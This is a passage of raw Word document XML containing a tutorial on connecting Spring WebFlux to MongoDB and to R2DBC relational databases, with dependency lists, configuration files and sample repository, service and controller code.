          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reactive Relational Database Connectivity) with Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286F2DEA" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Steps for Connecting MongoDB (Reactive) to Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C413CA7"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Add Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0B9EA"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irst, you need to include the required dependencies in your pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A951BF" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Maven Dependencies for MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB20373"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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B1E4E"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 Spring WebFlux Starter --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620673C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2C9439D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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AB3F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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77569E3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51006026"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 Spring Data MongoDB (Reactive) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675664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30E073ED"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC1A4C"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artifactId&gt;spring-boot-starter-data-mongodb-reactive&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19AF3A"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166400D7"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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580F77F" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Gradle Dependencies for MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA3903E"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E14A7B"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mplementation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF30DC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mplementation 'org.springframework.boot:spring-boot-starter-data-mongodb-reactive'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60635A03"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5E810812"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onfigure MongoDB Connection (application.yml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F725C"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Next, configure the connection settings for MongoDB in your application.yml or application.properties file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C72E267" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E645EFC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9CD404"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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7EA1ED"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mongodb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716E054"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uri: mongodb://localhost:27017/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8F18C" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43476B97"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data.mongodb.uri=mongodb://localhost:27017/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F750A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reate a Domain Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD02FD"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Define a domain model (or entity) that corresponds to a MongoDB collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C856DD"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annotation.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B9238C"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mongodb.core.mapping.Document;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41955B5F" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DF171E"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Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8697F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FBB50" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B41BFD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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64692B1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String id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5F91A"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475230B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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722AC66" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483CA47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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D3F4B"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34F1FB96"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reate a Reactive Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424D6D14"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Create a repository interface that extends ReactiveMongoRepository for MongoDB interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E6BF6"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mongodb.repository.ReactiveMongoRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54609216" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D1280B"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interface ItemRepository extends ReactiveMongoRepository&lt;Item, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF9DD8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You can define custom queries here if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B3577D"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4C2FFDAC"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reate a Service Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68239037"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service layer will interact with the repository to fetch data in a non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37607AED"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B58B3FD"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD94E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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F453668"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45163D" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E72EFB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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A62F2E2"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510C92F4" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6E8616"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1AE5F7"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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF504C0" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C439A8"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE497E7"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Repository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA469C3"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417A3D73" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099435EE"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Item&gt; getItemById(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E59413"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Repository.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E619D"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5CA38D2A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096B68E4"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Item&gt; createItem(Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3A42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Repository.save(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC73C2"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7C51B75C"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65F4351D"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reate a Reactive Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A67A9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Define a controller that exposes REST endpoints for interacting with the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B8EF2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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBAB8C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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4E8FF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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF4E37F"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C85BE6" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567A5B73"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F131CE6"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48806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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77725830" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AE1DCC"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA1EC2"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613AD7DC" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2977F587"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etMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A13176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Item&gt; getItemById(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4974CE3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 xml:space="preserve">        return itemService.getItemById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116DB49"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04E73CD1" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3614C15E"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B09C4"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC27D2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Service.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247BF38"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257FABD3" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEF8762"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59298A4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Item&gt; createItem(@RequestBody Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9965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Service.createItem(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F84577"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748DCE3A"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7F2D8BC4"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un the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1157D26C"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You can now run your Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71302238"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vnw spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9DA5E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Your Spring WebFlux application is now connected to MongoDB reactively!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F21D3A" w14:textId="77777777" w:rsidR="00C201B0"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4381B6C">
          <v:rect id="_x0000_i2323" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43582E82" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Steps for Connecting R2DBC (Reactive Relational Database) to Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FD1568"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Add Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B0B0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nclude the necessary dependencies for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., PostgreSQL, H2) in your pom.xml or build.gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E51DF22" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Maven Dependencies for R2DBC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9F6EB"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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2477F"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 Spring WebFlux Starter --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016DC0D6"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6A8B8238"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050F8C32"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081FDAE"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55EDD9CC" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C93BEE"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 R2DBC PostgreSQL Driver --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CE49D"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00AB3BFF"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groupId&gt;io.r2dbc&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44295AC3"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artifactId&gt;r2dbc-postgresql&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BBC5E"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68C612B3" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C851D8"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 Spring Data R2DBC --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8913A"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76E83C07"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groupId&gt;org.springframework.data&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653D034"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artifactId&gt;spring-data-r2dbc&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186737E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4AD7762C" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DD621B"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 H2 Database (Optional for Development) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360983C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2610EDDE"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groupId&gt;com.h2database&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72821432"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artifactId&gt;h2&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034DA50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scope&gt;runtime&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BF9497"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54B44969"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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237128D9" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Gradle Dependencies for R2DBC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738CF4B"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69754E8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mplementation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54519808"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mplementation 'io.r2dbc:r2dbc-postgresql'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59425DB2"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mplementation 'org.springframework.data:spring-data-r2dbc'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621159FE"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untimeOnly 'com.h2database:h2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6476E"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41DF1EDA"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onfigure R2DBC Connection (application.yml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF6D82"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Define the connection properties for your R2DBC-enabled database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1008E5AD" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405FE25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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397AB178"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2dbc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F71339"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url: r2dbc:postgresql://localhost:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9484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username: myuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38459139"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assword: mypassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1069B"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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C74C69"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2dbc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB4BC3"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positories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302635BB"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nabled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8221F" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871DB47"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r2dbc.url=r2dbc:postgresql://localhost:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F5E85D"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r2dbc.username=myuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0331F"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r2dbc.password=mypassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15DEFD"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data.r2dbc.repositories.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441868A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reate a Domain Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77729E5C"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Define a domain model to represent the data in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332204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annotation.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C9976"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relational.core.mapping.Table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6805A8" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14ADDAF2"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able("items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB5326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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5AA37A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763E836A"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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574482B3"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56FD57"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7641FD8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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7CE87" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CAAEA9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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F6324B"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06F42AC3"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reate a Repository for Reactive Database Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60192134"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se ReactiveCrudRepository to handle the database operations reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BA1BB"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repository.reactive.ReactiveCrudRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2218549C" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7297B3"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interface ItemRepository extends ReactiveCrudRepository&lt;Item, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39327C4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60D5955D"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reate a Service Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD0031F"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service class interacts with the repository in a non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314C382"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9D26D2"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE722E6"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732BEE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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D171BD" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E053BBF"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D1F14A"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66229B17" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
